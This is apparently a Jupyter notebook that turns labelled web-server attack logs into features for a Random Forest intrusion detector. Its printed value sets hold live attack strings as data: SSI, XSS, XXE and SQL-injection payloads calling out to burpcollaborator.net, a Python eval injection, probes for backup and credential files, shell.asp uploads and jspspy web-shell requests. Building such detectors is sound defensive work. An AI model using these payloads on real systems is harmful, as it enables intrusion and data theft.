In [1]:
!pip3 install pandas openpyxl tqdm scikit-learn

You should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.[0m


# Import and PATH setting

In [2]:
import pickle
import joblib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
from tqdm import tqdm
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import OneHotEncoder

%matplotlib inline 

In [3]:
data_path = "./dataset"

# Preprocessing

## Excel Load

In [4]:
excels_path = glob(f"{data_path}/WEB*/*LBL*")
excels_path

['./dataset/WEB.Teamviewer.이용.업데이트.서버.해킹사고/3-09-WEB_IIS-LBL.xlsx',
 './dataset/WEB.홈페이지를.통한.내부망.장악/3-01-WEB_IIS-LBL.xlsx',
 './dataset/WEB.Apache.WAS(Tomcat).취약점.악용.권한.탈취.사고/3-14-WEB_Apache-LBL.xlsx',
 './dataset/WEB.IIS.SQL.Injection.취약점.악용.데이터.유출.사고/3-13-WEB_IIS-LBL.xlsx',
 './dataset/WEB.유닉스.취약점.악용.및.랜섬웨어.감염/3-02-WEB_Apache-LBL.xlsx']

In [5]:
web_df = pd.DataFrame()

for excel_path in tqdm(excels_path):
    df = pd.read_excel(excel_path, engine='openpyxl')
    web_df = pd.concat([web_df, df])

100%|██████████| 5/5 [00:07<00:00,  1.44s/it]


In [6]:
web_df.head()

Unnamed: 0,rn,event_time,s_ip,s_port,s_country,d_ip,d_port,d_country,direction,http_method,...,pkt_bytes,rcvd_bytes,referer,sent_bytes,user_agent,label_attack,label_mitre,label_scenario,Unnamed: 20,Unnamed: 21
0,1,10/28/21 2:27,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5547,480.0,-,5547.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,,
1,2,10/28/21 2:27,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5547,480.0,-,5547.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,,
2,3,10/28/21 2:27,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5549,423.0,http://218.49.112.115/Client.txt,5549.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,,
3,4,10/28/21 2:28,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5547,506.0,-,5547.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,,
4,5,10/29/21 5:30,172.16.1.72,0,-,172.16.1.60,80,-,1,GET,...,5546,267.0,-,5546.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,normal,-,-,,


In [7]:
web_df.info()

<class 'pandas.core.frame.DataFrame'>
Index: 40182 entries, 0 to 543
Data columns (total 24 columns):
 #   Column          Non-Null Count  Dtype  
---  ------          --------------  -----  
 0   rn              40182 non-null  int64  
 1   event_time      40182 non-null  object 
 2   s_ip            40182 non-null  object 
 3   s_port          40182 non-null  int64  
 4   s_country       40182 non-null  object 
 5   d_ip            40182 non-null  object 
 6   d_port          40182 non-null  int64  
 7   d_country       40182 non-null  object 
 8   direction       40182 non-null  int64  
 9   http_method     40182 non-null  object 
 10  http_query      23626 non-null  object 
 11  http_version    40182 non-null  object 
 12  http_url        40182 non-null  object 
 13  http_status     40182 non-null  int64  
 14  pkt_bytes       40182 non-null  int64  
 15  rcvd_bytes      2318 non-null   float64
 16  referer         40182 non-null  object 
 17  sent_bytes      13444 non-null  float6

In [8]:
web_df = web_df.reset_index()

## 필요없는 열 삭제

In [9]:
web_df.isnull().sum()

index                 0
rn                    0
event_time            0
s_ip                  0
s_port                0
s_country             0
d_ip                  0
d_port                0
d_country             0
direction             0
http_method           0
http_query        16556
http_version          0
http_url              0
http_status           0
pkt_bytes             0
rcvd_bytes        37864
referer               0
sent_bytes        26738
user_agent            0
label_attack          0
label_mitre           0
label_scenario        0
Unnamed: 20       40182
Unnamed: 21       40181
dtype: int64

In [10]:
web_df.drop(['index', 'rn', 'event_time', 's_ip', 's_port', 's_country', 'd_ip', 'd_port',
             'd_country', 'user_agent', 'label_mitre', 'label_scenario',
             'Unnamed: 20','Unnamed: 21'], axis=1, inplace=True)

In [11]:
web_df.head()

Unnamed: 0,direction,http_method,http_query,http_version,http_url,http_status,pkt_bytes,rcvd_bytes,referer,sent_bytes,label_attack
0,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480.0,-,5547.0,attack
1,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480.0,-,5547.0,attack
2,3,GET,-,HTTP/1.1,/favicon.ico,404,5549,423.0,http://218.49.112.115/Client.txt,5549.0,attack
3,3,GET,-,HTTP/1.1,/Client.txt,404,5547,506.0,-,5547.0,attack
4,1,GET,-,HTTP/1.1,/favicon.ico,404,5546,267.0,-,5546.0,normal


In [12]:
web_df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 40182 entries, 0 to 40181
Data columns (total 11 columns):
 #   Column        Non-Null Count  Dtype  
---  ------        --------------  -----  
 0   direction     40182 non-null  int64  
 1   http_method   40182 non-null  object 
 2   http_query    23626 non-null  object 
 3   http_version  40182 non-null  object 
 4   http_url      40182 non-null  object 
 5   http_status   40182 non-null  int64  
 6   pkt_bytes     40182 non-null  int64  
 7   rcvd_bytes    2318 non-null   float64
 8   referer       40182 non-null  object 
 9   sent_bytes    13444 non-null  float64
 10  label_attack  40182 non-null  object 
dtypes: float64(2), int64(3), object(6)
memory usage: 3.4+ MB


## null 값 대체

### http_query

In [13]:
web_df["http_query"].value_counts()

http_query
-                                                                                                                                                                                                                                       12263
?org.apache.catalina.filters.CSRF_NONCE=2DB51B70DF17EEE27863DBC19BBBA14A                                                                                                                                                                10044
page=1&v_num=111                                                                                                                                                                                                                          400
full=true                                                                                                                                                                                                                                  22
?part=index&rid=20&bid=notice,talkbox

In [14]:
web_df["http_query"] = web_df["http_query"].fillna('-')

In [15]:
web_df["http_query"].isnull().sum()

0

### rcvd_bytes

In [16]:
web_df["rcvd_bytes"].value_counts()

rcvd_bytes
237.0    42
235.0    41
240.0    40
236.0    40
588.0    38
         ..
677.0     1
879.0     1
812.0     1
580.0     1
631.0     1
Name: count, Length: 410, dtype: int64

In [17]:
web_df["rcvd_bytes"] = web_df["rcvd_bytes"].fillna(0)

In [18]:
web_df["rcvd_bytes"].isnull().sum()

0

### sent_bytes

In [19]:
web_df["sent_bytes"].value_counts()

sent_bytes
332.0      10842
521.0        410
30447.0      229
5573.0        73
30446.0       60
           ...  
681.0          1
5578.0         1
23604.0        1
5600.0         1
15478.0        1
Name: count, Length: 484, dtype: int64

In [20]:
web_df["sent_bytes"] = web_df["sent_bytes"].fillna(0)

In [21]:
web_df["rcvd_bytes"].isnull().sum()

0

## 분석

In [22]:
web_df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 40182 entries, 0 to 40181
Data columns (total 11 columns):
 #   Column        Non-Null Count  Dtype  
---  ------        --------------  -----  
 0   direction     40182 non-null  int64  
 1   http_method   40182 non-null  object 
 2   http_query    40182 non-null  object 
 3   http_version  40182 non-null  object 
 4   http_url      40182 non-null  object 
 5   http_status   40182 non-null  int64  
 6   pkt_bytes     40182 non-null  int64  
 7   rcvd_bytes    40182 non-null  float64
 8   referer       40182 non-null  object 
 9   sent_bytes    40182 non-null  float64
 10  label_attack  40182 non-null  object 
dtypes: float64(2), int64(3), object(6)
memory usage: 3.4+ MB


In [23]:
attack_count = len(web_df[web_df["label_attack"]== "attack"])
normal_count = len(web_df[web_df["label_attack"]== "normal"])
print("attack : ", attack_count)
print("normal : ", normal_count)

attack :  39050
normal :  1132


In [24]:
web_df['rcvd_bytes'] = web_df['rcvd_bytes'].astype('Int64')
web_df['sent_bytes'] = web_df['sent_bytes'].astype('Int64')
web_df.head()

Unnamed: 0,direction,http_method,http_query,http_version,http_url,http_status,pkt_bytes,rcvd_bytes,referer,sent_bytes,label_attack
0,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480,-,5547,attack
1,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480,-,5547,attack
2,3,GET,-,HTTP/1.1,/favicon.ico,404,5549,423,http://218.49.112.115/Client.txt,5549,attack
3,3,GET,-,HTTP/1.1,/Client.txt,404,5547,506,-,5547,attack
4,1,GET,-,HTTP/1.1,/favicon.ico,404,5546,267,-,5546,normal


# ML convert

In [25]:
web_df

Unnamed: 0,direction,http_method,http_query,http_version,http_url,http_status,pkt_bytes,rcvd_bytes,referer,sent_bytes,label_attack
0,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480,-,5547,attack
1,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480,-,5547,attack
2,3,GET,-,HTTP/1.1,/favicon.ico,404,5549,423,http://218.49.112.115/Client.txt,5549,attack
3,3,GET,-,HTTP/1.1,/Client.txt,404,5547,506,-,5547,attack
4,1,GET,-,HTTP/1.1,/favicon.ico,404,5546,267,-,5546,normal
...,...,...,...,...,...,...,...,...,...,...,...
40177,3,GET,-,HTTP/1.1,/favicon.ico,200,482,0,http://172.16.1.80:8080/out/editor/20210824/js...,0,attack
40178,3,POST,-,HTTP/1.1,/out/editor/20210824/jspspy.jsp,200,7811,0,http://172.16.1.80:8080/out/editor/20210824/js...,0,attack
40179,3,GET,-,HTTP/1.1,/favicon.ico,200,482,0,http://172.16.1.80:8080/out/editor/20210824/js...,0,attack
40180,3,POST,-,HTTP/1.1,/out/editor/20210824/jspspy.jsp,200,9849,0,http://172.16.1.80:8080/out/editor/20210824/js...,0,attack


In [26]:
web_ml_df = pd.DataFrame()

## direction

In [27]:
set(web_df["direction"])

{1, 3}

In [28]:
ohe = OneHotEncoder(sparse=False)
# fit_transform은 train에만 사용하고 test에는 학습된 인코더에 fit만 해야한다
direction = ohe.fit_transform(web_df[['direction']]).astype(np.int64)
direction



array([[0, 1],
       [0, 1],
       [0, 1],
       ...,
       [0, 1],
       [0, 1],
       [0, 1]])

In [29]:
web_ml_df['direction_1'] = direction[:,0]
web_ml_df['direction_3'] = direction[:,1]

In [30]:
web_ml_df.head()

Unnamed: 0,direction_1,direction_3
0,0,1
1,0,1
2,0,1
3,0,1
4,1,0


## http_method

In [31]:
set(web_df["http_method"])

{'CONNECT', 'DEBUG', 'GET', 'GETS', 'POST', 'PUT', 'TRACE'}

In [32]:
method_dict = {
    'GET':0,
    'CONNECT':1,
    'POST':2,
    'GETS':3,
    'PUT':4,
    'DEBUG':5,
    'TRACE':6
}

method_len = len(method_dict)

In [33]:
method_arr = []

for method in web_df["http_method"]:
    data = np.zeros(method_len)
    data[method_dict[method]] = 1
    method_arr.append(data)
    
method_arr = np.array(method_arr).astype(np.int64)
method_arr.shape

(40182, 7)

In [34]:
for method in method_dict:
    web_ml_df[f"http_method_{method}"] = method_arr[:,method_dict[method]]

In [35]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE
0,0,1,1,0,0,0,0,0,0
1,0,1,1,0,0,0,0,0,0
2,0,1,1,0,0,0,0,0,0
3,0,1,1,0,0,0,0,0,0
4,1,0,1,0,0,0,0,0,0
...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0
40178,0,1,0,0,1,0,0,0,0
40179,0,1,1,0,0,0,0,0,0
40180,0,1,0,0,1,0,0,0,0


## http_query

In [36]:
max_features = 10

In [37]:
set(web_df["http_query"])

{'-',
 '<h1>j2eescan',
 '??Íëñ«',
 '??ãáãÓ.txt',
 '?ActionID=Upl',
 '?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684',
 '?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684',
 '?Command=FileUpload&Type=File&CurrentFolder=%2F',
 '?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F',
 '?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F',
 '?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/',
 '?Javascript',
 '?Type=Image&Connector=connectors/jsp/connector',
 '?Type=Media"',
 '?a=data&b=162933465757881&c=1&d=sub06',
 '?a=data&b=162933476803253&c=1&d=sub06',
 '?a=data&b=162933865159425&c=1&d=sub06',
 '?a=free&b=162980292245677&c=1&d=sub06',
 '?a=free&b=162980377652092&c=1&d=sub06',
 '?a=free&b=162980390089131&c=1&d=sub06',
 '?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0',
 '?action=save&type=&style=',
 '?action=stylepreview&id=1',
 '?action=upfi

In [38]:
http_query_vec = TfidfVectorizer(max_features=max_features)

In [39]:
http_query = http_query_vec.fit_transform(web_df["http_query"]).toarray()
http_query

array([[0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.],
       ...,
       [0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.]])

In [40]:
for i in range(max_features):
    web_ml_df[f"http_query_{i}"] = http_query[:, i]

In [41]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE,http_query_0,http_query_1,http_query_2,http_query_3,http_query_4,http_query_5,http_query_6,http_query_7,http_query_8,http_query_9
0,0,1,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
1,0,1,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
2,0,1,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
3,0,1,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
4,1,0,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
40178,0,1,0,0,1,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
40179,0,1,1,0,0,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
40180,0,1,0,0,1,0,0,0,0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0


## http_version

In [42]:
set(web_df["http_version"])

{'HTTP/1.0', 'HTTP/1.1'}

In [43]:
version_dict = {
    'HTTP/1.0':0,
    'HTTP/1.1':1
}

version_len = len(version_dict)

In [44]:
version_arr = []

for version in web_df["http_version"]:
    data = np.zeros(version_len)
    data[version_dict[version]] = 1
    version_arr.append(data)
    
version_arr = np.array(version_arr).astype(np.int64)
version_arr.shape

(40182, 2)

In [45]:
for version in version_dict:
    web_ml_df[f"http_version_{version}"] = version_arr[:,version_dict[version]]

In [46]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE,http_query_0,...,http_query_2,http_query_3,http_query_4,http_query_5,http_query_6,http_query_7,http_query_8,http_query_9,http_version_HTTP/1.0,http_version_HTTP/1.1
0,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
1,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
2,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
3,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
4,1,0,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
40178,0,1,0,0,1,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
40179,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1
40180,0,1,0,0,1,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,1


## http_url

In [47]:
set(web_df["http_url"])

{'/testweb/image/cat_kids_2off.gif',
 '//bak/sql1.rar ',
 '//image/218X74_qt.jpg ',
 '//aspnet_client/system_web/ ',
 '/testweb/image/top_menu4.gif',
 '//admin/upload.htm ',
 '/유tresearch/happyaxis.jsp',
 '//images/21366.swf ',
 '//image/ycjx.jpg ',
 '//logo_mp3.gif ',
 '/shop/image/left_menu.gif',
 '/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml',
 '/testweb/image/hobby_search1.gif',
 '//aspnet_client/system_web/2_0_50727/ ',
 '//s8qqmima.txt ',
 '//dbase/data1.rar ',
 '//user/s8 ',
 '//aspnet_client/FreeTextBox/ ',
 '/shop/image/cat_sale_8off.gif',
 '//ad/z9v8config.inc.bak ',
 '//backups/sql1.rar ',
 '/testweb/board/board_list.aspk4238kum9g&#65;fvm5sit4dq',
 '//login/index ',
 '//a.aspx;.jpg ',
 '//data/%23data1.asa ',
 '//dbase/bak.rar ',
 '//image/so6159.gif ',
 '/testweb/image/icon_t.gif',
 '/shop/image/cat_hobby_9off.gif',
 '//uploadimage/z9v8config.inc.bak ',
 '//inc/z9v8ftp.txt ',
 '//blank ',
 '//pubwin_6_pg ',
 '//conn.asp.bak ',
 '//ztpass.txt ',
 '//jhqq.txt 

In [48]:
max_features = 10

In [49]:
http_url_vec = TfidfVectorizer(max_features=max_features)

In [50]:
http_url = http_url_vec.fit_transform(web_df["http_url"]).toarray()
http_url

array([[0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.],
       ...,
       [0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.],
       [0., 0., 0., ..., 0., 0., 0.]])

In [51]:
for i in range(max_features):
    web_ml_df[f"http_url_{i}"] = http_url[:, i]

In [52]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE,http_query_0,...,http_url_0,http_url_1,http_url_2,http_url_3,http_url_4,http_url_5,http_url_6,http_url_7,http_url_8,http_url_9
0,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
1,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
2,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
3,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
4,1,0,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
40178,0,1,0,0,1,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
40179,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0
40180,0,1,0,0,1,0,0,0,0,0.0,...,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0


## http_status

In [53]:
set(web_df["http_status"])

{200, 302, 304, 401, 403, 404, 405, 500, 501}

In [54]:
status_dict = {
    '200':0,
    '302':1,
    '304':2,
    '401':3,
    '403':4,
    '404':5,
    '405':6,
    '500':7,
    '501':8
}

status_len = len(status_dict)

In [55]:
status_arr = []

for status in web_df["http_status"]:
    data = np.zeros(status_len)
    data[status_dict[str(status)]] = 1
    status_arr.append(data)
    
status_arr = np.array(status_arr).astype(np.int64)
status_arr.shape

(40182, 9)

In [56]:
for status in status_dict:
    web_ml_df[f"http_status_{status}"] = status_arr[:,status_dict[str(status)]]

In [57]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE,http_query_0,...,http_url_9,http_status_200,http_status_302,http_status_304,http_status_401,http_status_403,http_status_404,http_status_405,http_status_500,http_status_501
0,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0,0,0,0,0,1,0,0,0
1,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0,0,0,0,0,1,0,0,0
2,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0,0,0,0,0,1,0,0,0
3,0,1,1,0,0,0,0,0,0,0.0,...,0.0,0,0,0,0,0,1,0,0,0
4,1,0,1,0,0,0,0,0,0,0.0,...,0.0,0,0,0,0,0,1,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0,0.0,...,0.0,1,0,0,0,0,0,0,0,0
40178,0,1,0,0,1,0,0,0,0,0.0,...,0.0,1,0,0,0,0,0,0,0,0
40179,0,1,1,0,0,0,0,0,0,0.0,...,0.0,1,0,0,0,0,0,0,0,0
40180,0,1,0,0,1,0,0,0,0,0.0,...,0.0,1,0,0,0,0,0,0,0,0


## referer

In [58]:
set(web_df["referer"])

{'"-->\'-->`--><!--#set+var="kqx"+value="jpw140ipk4"--><!--#set+var="msz"+value="lry362krm6"--><!--#echo+var="kqx"--><!--#echo+var="msz"--><!--#exec+cmd="nslookup+-q=cname+6cjorn5c7rsjw8p8mamgzq3a41avynwbryim7.burpcollaborator.net"+-->',
 '\'"><svg/onload=(new(Image)).src=\'//zfihug85akvcz1s1p3p92j637udo1gr4mrdf2\\56burpcollaborator.net\'>',
 '(select+extractvalue(xmltype(\'<?xml+version="1.0"+encoding="UTF-8"?><!DOCTYPE+root+[+<!ENTITY+%+txgtv+SYSTEM+"http://gg0yvx9mb1wt0itiqkqq307k8be528q3du1j.burpcollab\'||\'orator.net/">%txgtv;]>\'),\'/l\')+from+dual)',
 "(select+load_file('\\\\\\\\p9z7o62v4ap2trmrjtjzw90t1k7ev5xtsgj48.burpcollaborator.net\\\\rgg'))",
 '-',
 '1olqog0gxr',
 'dlnrh{{876*134}}hmb77',
 "eval(compile('for+x+in+range(1):\\n+import+time\\n+time.sleep(20)','a','single'))",
 'gp9y4ximk15t9i2izkzqc0gkhbn5bx3ly8pwe',
 'http://172.16.1.60/',
 'http://172.16.1.60/shop/about/cclener.html',
 'http://172.16.1.60/shop/shop/main.asp',
 'http://172.16.1.60/shop/shop/topview.asp?top=8

In [59]:
max_features = 10

In [60]:
referer_vec = TfidfVectorizer(max_features=max_features)

In [61]:
referer = referer_vec.fit_transform(web_df["referer"]).toarray()
referer

array([[0.        , 0.        , 0.        , ..., 0.        , 0.        ,
        0.        ],
       [0.        , 0.        , 0.        , ..., 0.        , 0.        ,
        0.        ],
       [0.45234758, 0.45234758, 0.        , ..., 0.        , 0.        ,
        0.        ],
       ...,
       [0.        , 0.        , 0.8929006 , ..., 0.        , 0.        ,
        0.        ],
       [0.        , 0.        , 0.8929006 , ..., 0.        , 0.        ,
        0.        ],
       [0.        , 0.        , 0.8929006 , ..., 0.        , 0.        ,
        0.        ]])

In [62]:
for i in range(max_features):
    web_ml_df[f"referer_{i}"] = referer[:, i]

In [63]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE,http_query_0,...,referer_0,referer_1,referer_2,referer_3,referer_4,referer_5,referer_6,referer_7,referer_8,referer_9
0,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.000000,0.000000,0.000000,0.000000,0.0,0.000000,0.0,0.0,0.0
1,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.000000,0.000000,0.000000,0.000000,0.0,0.000000,0.0,0.0,0.0
2,0,1,1,0,0,0,0,0,0,0.0,...,0.452348,0.452348,0.000000,0.452348,0.452348,0.0,0.426059,0.0,0.0,0.0
3,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.000000,0.000000,0.000000,0.000000,0.0,0.000000,0.0,0.0,0.0
4,1,0,1,0,0,0,0,0,0,0.0,...,0.000000,0.000000,0.000000,0.000000,0.000000,0.0,0.000000,0.0,0.0,0.0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.000000,0.892901,0.000000,0.000000,0.0,0.450254,0.0,0.0,0.0
40178,0,1,0,0,1,0,0,0,0,0.0,...,0.000000,0.000000,0.892901,0.000000,0.000000,0.0,0.450254,0.0,0.0,0.0
40179,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.000000,0.892901,0.000000,0.000000,0.0,0.450254,0.0,0.0,0.0
40180,0,1,0,0,1,0,0,0,0,0.0,...,0.000000,0.000000,0.892901,0.000000,0.000000,0.0,0.450254,0.0,0.0,0.0


## etc

In [64]:
web_ml_df["pkt_bytes"] = web_df["pkt_bytes"]
web_ml_df["rcvd_bytes"] = web_df["rcvd_bytes"]
web_ml_df["sent_bytes"] = web_df["sent_bytes"]
web_ml_df["label_attack"] = web_df["label_attack"]

In [65]:
web_ml_df

Unnamed: 0,direction_1,direction_3,http_method_GET,http_method_CONNECT,http_method_POST,http_method_GETS,http_method_PUT,http_method_DEBUG,http_method_TRACE,http_query_0,...,referer_4,referer_5,referer_6,referer_7,referer_8,referer_9,pkt_bytes,rcvd_bytes,sent_bytes,label_attack
0,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.0,0.000000,0.0,0.0,0.0,5547,480,5547,attack
1,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.0,0.000000,0.0,0.0,0.0,5547,480,5547,attack
2,0,1,1,0,0,0,0,0,0,0.0,...,0.452348,0.0,0.426059,0.0,0.0,0.0,5549,423,5549,attack
3,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.0,0.000000,0.0,0.0,0.0,5547,506,5547,attack
4,1,0,1,0,0,0,0,0,0,0.0,...,0.000000,0.0,0.000000,0.0,0.0,0.0,5546,267,5546,normal
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
40177,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.0,0.450254,0.0,0.0,0.0,482,0,0,attack
40178,0,1,0,0,1,0,0,0,0,0.0,...,0.000000,0.0,0.450254,0.0,0.0,0.0,7811,0,0,attack
40179,0,1,1,0,0,0,0,0,0,0.0,...,0.000000,0.0,0.450254,0.0,0.0,0.0,482,0,0,attack
40180,0,1,0,0,1,0,0,0,0,0.0,...,0.000000,0.0,0.450254,0.0,0.0,0.0,9849,0,0,attack


# Save

## csv

In [66]:
web_ml_df.to_csv("./dataset/web_ml_df.csv", index = False)

## TfidfVectorizer

In [67]:
joblib.dump(http_query_vec,"./model/Random Forest/http_query_vec.pkl")
joblib.dump(http_url_vec,"./model/Random Forest/http_url_vec.pkl")
joblib.dump(referer_vec,"./model/Random Forest/referer_vec.pkl")

['./model/Random Forest/referer_vec.pkl']

In [68]:
http_query_vec = joblib.load('./model/Random Forest/http_query_vec.pkl')
http_query_vec